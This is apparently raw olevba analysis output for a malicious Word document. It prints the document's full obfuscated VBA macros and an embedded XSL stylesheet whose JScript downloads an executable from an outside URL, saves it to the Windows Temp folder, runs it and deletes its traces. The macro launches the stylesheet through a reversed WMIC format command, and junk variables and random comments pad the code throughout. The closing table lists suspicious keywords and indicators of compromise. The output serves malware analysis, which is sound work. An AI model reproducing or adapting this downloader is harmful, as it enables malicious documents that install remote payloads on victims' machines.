olevba 0.54dev4 - http://decalage.info/python/oletools
Flags        Filename                                                         
-----------  -----------------------------------------------------------------
OLE:M-SIHB-- /home/h/work/20190722/extracted/word/vbaProject.bin
===============================================================================
FILE: /home/h/work/20190722/extracted/word/vbaProject.bin
Type: OLE
-------------------------------------------------------------------------------
VBA MACRO ThisDocument.cls 
in file: /home/h/work/20190722/extracted/word/vbaProject.bin - OLE stream: u'VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
Sub DontRun()
	Debug.Print "This is the substitute VBA"
End Sub
-------------------------------------------------------------------------------
VBA MACRO aM6Qu2vfS.bas 
in file: /home/h/work/20190722/extracted/word/vbaProject.bin - OLE stream: u'VBA/aM6Qu2vfS'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
Function aoYbuI(aX2A6F9V As Long) As String
Dim a8P4c7Fh5 As Integer
a8P4c7Fh5 = -9827
Dim a8lcy4goh As String
a8lcy4goh = "a8JN2TZBb"
Dim atfcLg As Boolean
atfcLg = False
' Equipped zero

Dim aqBgFRl As String
aqBgFRl = "aqUsB"
' Truck smith opprobrium throws infinity
Dim a7GpzhQuI As String
a7GpzhQuI = "a1e7WpcO"
' Asus cereal
Dim aPpjFSs As String
aPpjFSs = "aD4EFjV"
Dim awIyP8O1 As Boolean
awIyP8O1 = False
' Boobs lecturer bedford yard voiceless
Dim abqNl As String
abqNl = "a47wZ"
' Convocation strain danny
Dim aeS81lvV As String
aeS81lvV = "auXae"
' Qatar stimulation commodity

Dim auNtz As String
auNtz = "aJfsFZ"
' Intercede meager charger
Dim aSpiAEc As Integer
aSpiAEc = -27872
End Function
-------------------------------------------------------------------------------
VBA MACRO afJX6ELpP.bas 
in file: /home/h/work/20190722/extracted/word/vbaProject.bin - OLE stream: u'VBA/afJX6ELpP'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
Function au2pneaM(aODWg8 As String) As String
Dim acaElO As Integer
acaElO = 13932
' Etruscan usury
Dim a4L1gb As Boolean
a4L1gb = True
' Improvident mister annex
Dim anRyMqN98 As Long
anRyMqN98 = -22900
' Issues
Dim aku2pi As String
aku2pi = "aVudi"
' Personnel animates

Dim atqe4WD As String
atqe4WD = "aQfho1prA"
' Tram
Dim af8nIw As Integer
af8nIw = 21610
' Arranged deprecate

Dim aA7eBf As String
aA7eBf = "aa8Wbq"
' Soon certification humidity
Dim ao4Wn As Long
ao4Wn = 1717
' Lanes beginning
Dim aJsBMNKzp As String
aJsBMNKzp = "a1Sks"
' Vengeful aluminium result wifi
Dim aGBoEb7 As Integer
aGBoEb7 = 17072
Dim a4BGLt As String
a4BGLt = "a4uOpNM"
' Ky plate
Dim a9nlekF As String
a9nlekF = "alE9m"
' Progress behalf right-hand reporting
Dim aBNzu As String
aBNzu = "aKxDm3Ova"
' Formality skills biographies statuesque dicks
End Function
Public Sub adWspA8(aSVp8zOe As String, aH6MX As String)
Dim ajT74 As Object
Set ajT74 = CreateObject("Scripting.FileSystemObject")
Dim amxgqjco As Object
Set amxgqjco = ajT74.CreateTextFile(aSVp8zOe, True, True)
amxgqjco.Write aH6MX
amxgqjco.Close
Dim avfyh As Long
avfyh = 9307
' Designers
Dim adFnY As String
adFnY = "aDMm7TH"
Dim a0o8mz As Long
a0o8mz = -8443
' Term reporter
Dim aLSJy2 As String
aLSJy2 = "akgyqHKb0"
' Creator
Dim a7bszI As Long
a7bszI = -7866
' Snapshot
Dim abOgHVUT As Boolean
abOgHVUT = True
Dim aMstj7lF6 As String
aMstj7lF6 = "a4fkT0i"
' Trucks posterior compression
Dim axtnAZTyK As Integer
axtnAZTyK = 21476
' Cliff absinthe thy pantheon exasperation platoon

Dim aVlA9q As String
aVlA9q = "aeaPcNjW8"
' Linguist inflected boeotia blasted
Dim akN9tjm As Boolean
akN9tjm = False
' Investments perturbation ministry acorn
Dim aCoFzRD As String
aCoFzRD = "aSVjmBrg1"
' Partisan avignon sealskin edited
End Sub
-------------------------------------------------------------------------------
VBA MACRO alTuUemw.bas 
in file: /home/h/work/20190722/extracted/word/vbaProject.bin - OLE stream: u'VBA/alTuUemw'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
Sub main()
Dim aaQlMr As Boolean
aaQlMr = False
' Lancaster
Dim aRiYov As Boolean
aRiYov = True
' Omaha beastality slides tenaciously
Dim aNzlI As Boolean
aNzlI = False
' Worshipping likelihood
Dim arZJa As Boolean
arZJa = True
Dim a2NgyD1dC As String
a2NgyD1dC = "aeC1B"
' Whiles stations alchemists
Dim avKRz As Integer
avKRz = -16206
Dim aS9wHfi As String
aS9wHfi = "aVxEmOkTZ"
' Jets quarterly contract

Dim aSaAjdGg As String
aSaAjdGg = "ayYVc2Svz"
' Liver torpedoes contribution
Dim atBCe As Boolean
atBCe = False
' Vicarage donated
Dim adxrhc As Boolean
adxrhc = True
Dim aTloBe As Boolean
aTloBe = True
' Bracelet ornamentation
Dim a9me0xw5 As Boolean
a9me0xw5 = True
' Suites despondency
Dim azBn5 As Boolean
azBn5 = True
' Ax adverted ng pointer
Dim aKO10Io As Long
aKO10Io = -23144
Dim a3ropzL9s As String
a3ropzL9s = "aEzmHh"
' Regardless quartet
Dim afj1Aq43R As Long
afj1Aq43R = -12510
' Solaris trainer tail
Dim aCU7oL As Integer
aCU7oL = -11924
Dim aAbHfR As Boolean
aAbHfR = False
' Sitemap park sailing
Dim aXtIkN As Object
Dim a6e0LJ7 As Boolean
a6e0LJ7 = True
' Insertion hesse translated
Dim aZ496I As Boolean
aZ496I = True
' Crevice anyone weight
Dim aoG8er As Integer
aoG8er = -12987
Set aXtIkN = New a0woxm

Dim aeoFY1 As String
aeoFY1 = "ahnWZab3F"
Dim aB2Hdp As Integer
aB2Hdp = -20477
' Nocturnal talkative tricks
Dim aUNrk7 As Boolean
aUNrk7 = True
' Spiral time-honored pos
Dim akZUbfhQ As Boolean
akZUbfhQ = False
' Mrna rouge bail enact
Dim aHwPzG As String
Dim a01DumIa As Boolean
a01DumIa = True
Dim aGTiU As Boolean
aGTiU = True
' Exercise thriller abstruse capuchin hitting
aHwPzG = aXtIkN.auJtb.Text
Dim aBb80q4Pa As Integer
aBb80q4Pa = 24981
Dim auoGQw3 As Long
auoGQw3 = 23671
' Schools woolen
Dim aFh7lS9d As Integer
aFh7lS9d = 13456
' Wine variegated scsi ambrosia sale
Dim aLBYw0 As Boolean
aLBYw0 = True
Dim agvpx As String

Dim aDcZdG As String
aDcZdG = "anqr0aU"
' Curves nz entities empty
Dim axGbY As String
axGbY = "aTKDI"
Dim aNSmdzfk1 As String
aNSmdzfk1 = "acSNTu5"
' Internationally genealogy tish
Dim awzhTkbMS As Long
awzhTkbMS = -31202
' Lab challenging legitimately bracken
agvpx = "C:\\Windows\\Temp\\aXwZvnt48.xsl"

Dim afemjKg97 As String
afemjKg97 = "a6p87"
' Nn
Dim auM68Ag As Long
auM68Ag = 17074
' Fortieth misrule gig showcase managed rind
Dim aErQyi2gz As String
aErQyi2gz = "a6MTgPiQ"
Dim aVcFDEi As Long
aVcFDEi = 7443
a7zKv = Chr(34)
Dim aiOM8J As Integer
aiOM8J = 30942
' Devon
Dim aeAFaG4 As String
aeAFaG4 = "awFtB"
Call adWspA8(agvpx, aHwPzG)
Dim aB8pyl As Boolean
aB8pyl = True
' Diaphragm
Dim aZfPL96 As Long
aZfPL96 = 30840
' Batman wellington aground grave
Dim arN4esO As String
arN4esO = "abWB7"
' Toyota bedtime months aimless
Dim ad48H As Integer
ad48H = 7083
' Engineer
Dim aQEnXN As Integer
aQEnXN = -7660
' Billy
Dim aoGiXhZt6 As Boolean
aoGiXhZt6 = True
' Internationally home pyramidal disable shorts academic snob
Dim afTt6gON As Long
afTt6gON = 3489
' Inertia
Dim a2VbTxOCP As String
a2VbTxOCP = "aYq8uRfA"
Dim aG2us As Integer
aG2us = -1798
' Agreed origins
Dim aWFvAHo5 As Integer
aWFvAHo5 = -30410
' Bereft trail porridge aurora tab
Dim awbJZu As Integer
awbJZu = -20058
' Heterogeneous glutton perfidy boulevard
Dim aR98iMO As Integer
aR98iMO = -12765
' Mangy twenty-eighth law disproportionate
Dim a7nUHBR As String
a7nUHBR = "ahtex"
Dim aPWET As Integer
aPWET = -11045
' Alloy boating abdication bahia small
Dim a6JrwTD As Boolean
a6JrwTD = False
' Dishes alleviate turkey
a5rk9 = StrReverse(":tamrof/ teg so cimw")
Shell a5rk9 & a7zKv & agvpx & a7zKv, 0

Dim a3Csw6Z1 As String
a3Csw6Z1 = "asfShVxb"
' Town pg
Dim aBdjQApr As Long
aBdjQApr = -14422
' Eastern conservatory automobile whine
Dim aL7hGU8 As Boolean
aL7hGU8 = False
' People


Dim aD89R As String
aD89R = "aumS1Ky"
' Fidget metropolitan missile
Dim alk15e As String
alk15e = "admxuKl"
' Thumbnail yolk
Dim arbDG48VP As Boolean
arbDG48VP = False
' Virility collective walked elated brush
Dim a6WUx As Boolean
a6WUx = True
' Shell
Dim aBrSHazJU As Boolean
aBrSHazJU = True
' Knowledge cartoons
Dim ae6XvTqrf As String
ae6XvTqrf = "a82GZf"
' Gary sofa journey techrepublic puzzles examinations rat
End Sub
-------------------------------------------------------------------------------
VBA MACRO a0woxm.frm 
in file: /home/h/work/20190722/extracted/word/vbaProject.bin - OLE stream: u'VBA/a0woxm'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
Private Sub UserForm_Initialize()
Dim asMDNG4 As Boolean
asMDNG4 = False
Dim aDdyE As String
aDdyE = "aZNvGXR8"
Dim azmrO5 As Boolean
azmrO5 = True
' Screw education maple eastern africa

Dim aKuZICr7 As String
aKuZICr7 = "anzkItGKb"
' Conferencing
Dim aDb701JOn As Long
aDb701JOn = -10008
' Worse interred bras liquids violate
End Sub
Public Sub test()

Dim a87qC0z As String
a87qC0z = "axHtYM"
' War membrane
Dim azyFP3iH4 As Boolean
azyFP3iH4 = True
' Pestilent
Dim aYFmEgX As String
aYFmEgX = "aEZnmITys"
' Tuneful delicious hughes valuation
End Sub
-------------------------------------------------------------------------------
VBA FORM STRING IN '/home/h/work/20190722/extracted/word/vbaProject.bin' - OLE stream: u'a0woxm/o'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
<?xml version='1.0'?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:user="http://mycompany.com/mynamespace">
	<msxsl:script language="JScript" implements-prefix="user">
	<![CDATA[

		// url
		var azlW9BJ7 = "https://carmelavalles.com/site/wp-admin/chrome.bin";

		var a9ArS = new ActiveXObject("wscript.shell");
		var aWhiR = new ActiveXObject("scripting.filesystemobject");

		function axas5v9(a5OhCF)
		{
			var a1YiG5DuR = [
							"open",
							"send",
							"type",
							"write",
							"position",
							"savetofile",
							"close",
							"run"
						];

			return(a1YiG5DuR[a5OhCF]);
		}
	]]>
	</msxsl:script>
	<msxsl:script language="JScript" implements-prefix="user">
	<![CDATA[
		function aawg1(a5OhCF)
		{
			var a1vFwV = new ActiveXObject("msxml2.xmlhttp");

			a1vFwV.open("GET", azlW9BJ7, 0);
			a1vFwV.send();

			if(a1vFwV.status === 200 && a1vFwV.readystate === 4)
			{
				var akVXpGwht = new ActiveXObject("adodb.stream");
				akVXpGwht.open();
				akVXpGwht.type = 1;
				akVXpGwht.write(a1vFwV.responsebody);
				akVXpGwht.position = 0;
				akVXpGwht[axas5v9(5)](a5OhCF, 2);
				akVXpGwht.close();

				a9ArS.run(a5OhCF);

				// Self delete
				aWhiR.deletefile("C:\\Windows\\Temp\\aXwZvnt48.xsl");
			}
		}


	]]>
	</msxsl:script>
<xsl:template match="/">
<xsl:value-of select="user:aawg1('c:\\windows\temp\\awMiOFl.exe')"/>
</xsl:template>
</xsl:stylesheet>
-------------------------------------------------------------------------------
VBA FORM STRING IN '/home/h/work/20190722/extracted/word/vbaProject.bin' - OLE stream: u'a0woxm/o'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
TahomaV
-------------------------------------------------------------------------------
VBA FORM Variable "auJtb" IN '/home/h/work/20190722/extracted/word/vbaProject.bin' - OLE stream: u'a0woxm'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
<?xml version='1.0'?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:user="http://mycompany.com/mynamespace">
	<msxsl:script language="JScript" implements-prefix="user">
	<![CDATA[

		// url
		var azlW9BJ7 = "https://carmelavalles.com/site/wp-admin/chrome.bin";

		var a9ArS = new ActiveXObject("wscript.shell");
		var aWhiR = new ActiveXObject("scripting.filesystemobject");

		function axas5v9(a5OhCF)
		{
			var a1YiG5DuR = [
							"open",
							"send",
							"type",
							"write",
							"position",
							"savetofile",
							"close",
							"run"
						];

			return(a1YiG5DuR[a5OhCF]);
		}
	]]>
	</msxsl:script>
	<msxsl:script language="JScript" implements-prefix="user">
	<![CDATA[
		function aawg1(a5OhCF)
		{
			var a1vFwV = new ActiveXObject("msxml2.xmlhttp");

			a1vFwV.open("GET", azlW9BJ7, 0);
			a1vFwV.send();

			if(a1vFwV.status === 200 && a1vFwV.readystate === 4)
			{
				var akVXpGwht = new ActiveXObject("adodb.stream");
				akVXpGwht.open();
				akVXpGwht.type = 1;
				akVXpGwht.write(a1vFwV.responsebody);
				akVXpGwht.position = 0;
				akVXpGwht[axas5v9(5)](a5OhCF, 2);
				akVXpGwht.close();

				a9ArS.run(a5OhCF);

				// Self delete
				aWhiR.deletefile("C:\\Windows\\Temp\\aXwZvnt48.xsl");
			}
		}


	]]>
	</msxsl:script>
<xsl:template match="/">
<xsl:value-of select="user:aawg1('c:\\windows\temp\\awMiOFl.exe')"/>
</xsl:template>
</xsl:stylesheet>
+------------+----------------------+-----------------------------------------+
| Type       | Keyword              | Description                             |
+------------+----------------------+-----------------------------------------+
| Suspicious | Chr                  | May attempt to obfuscate specific       |
|            |                      | strings (use option --deobf to          |
|            |                      | deobfuscate)                            |
| Suspicious | StrReverse           | May attempt to obfuscate specific       |
|            |                      | strings (use option --deobf to          |
|            |                      | deobfuscate)                            |
| Suspicious | open                 | May open a file                         |
| Suspicious | Shell                | May run an executable file or a system  |
|            |                      | command                                 |
| Suspicious | wscript.shell        | May run an executable file or a system  |
|            |                      | command                                 |
| Suspicious | run                  | May run an executable file or a system  |
|            |                      | command                                 |
| Suspicious | Windows              | May enumerate application windows (if   |
|            |                      | combined with Shell.Application object) |
| Suspicious | CreateObject         | May create an OLE object                |
| Suspicious | CreateTextFile       | May create a text file                  |
| Suspicious | adodb.stream         | May create a text file                  |
| Suspicious | savetofile           | May create a text file                  |
| Suspicious | Write                | May write to a file (if combined with   |
|            |                      | Open)                                   |
| Suspicious | msxml2.xmlhttp       | May download files from the Internet    |
| Suspicious | Hex Strings          | Hex-encoded strings were detected, may  |
|            |                      | be used to obfuscate strings (option    |
|            |                      | --decode to see all)                    |
| Suspicious | Base64 Strings       | Base64-encoded strings were detected,   |
|            |                      | may be used to obfuscate strings        |
|            |                      | (option --decode to see all)            |
| IOC        | http://www.w3.org/19 | URL                                     |
|            | 99/XSL/Transform     |                                         |
| IOC        | http://mycompany.com | URL                                     |
|            | /mynamespace         |                                         |
| IOC        | https://carmelavalle | URL                                     |
|            | s.com/site/wp-       |                                         |
|            | admin/chrome.bin     |                                         |
| IOC        | awMiOFl.exe          | Executable file name                    |
+------------+----------------------+-----------------------------------------+

